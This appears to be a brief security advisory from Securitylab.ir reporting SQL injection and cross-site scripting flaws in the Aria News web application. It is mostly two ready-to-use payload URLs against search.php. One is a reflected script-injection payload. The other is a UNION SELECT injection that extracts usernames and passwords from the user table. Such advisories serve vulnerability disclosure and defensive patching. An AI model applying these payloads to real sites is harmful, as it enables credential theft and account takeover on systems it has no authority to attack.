Aria News suffers from remote SQL injection and cross site scripting vulnerabilities.
a389a2803ba19296806e9b594a0757403db2341a931ec39bf8bf6fa0291e11ad
######################### Securitylab.ir ########################
# Application Info:
# Name: Aria News
# Web: http://www.aryalink.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection & xss
# Risk: Medium
#======================================================
# XSS:
# http://www.site.com/search.php?search=<body+onload=alert(securitylab.ir)>
#
# Sql:
# http://www.site.com/search.php?search=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
#======================================================
#
# Securitylab Security Research Team
#
###################################################################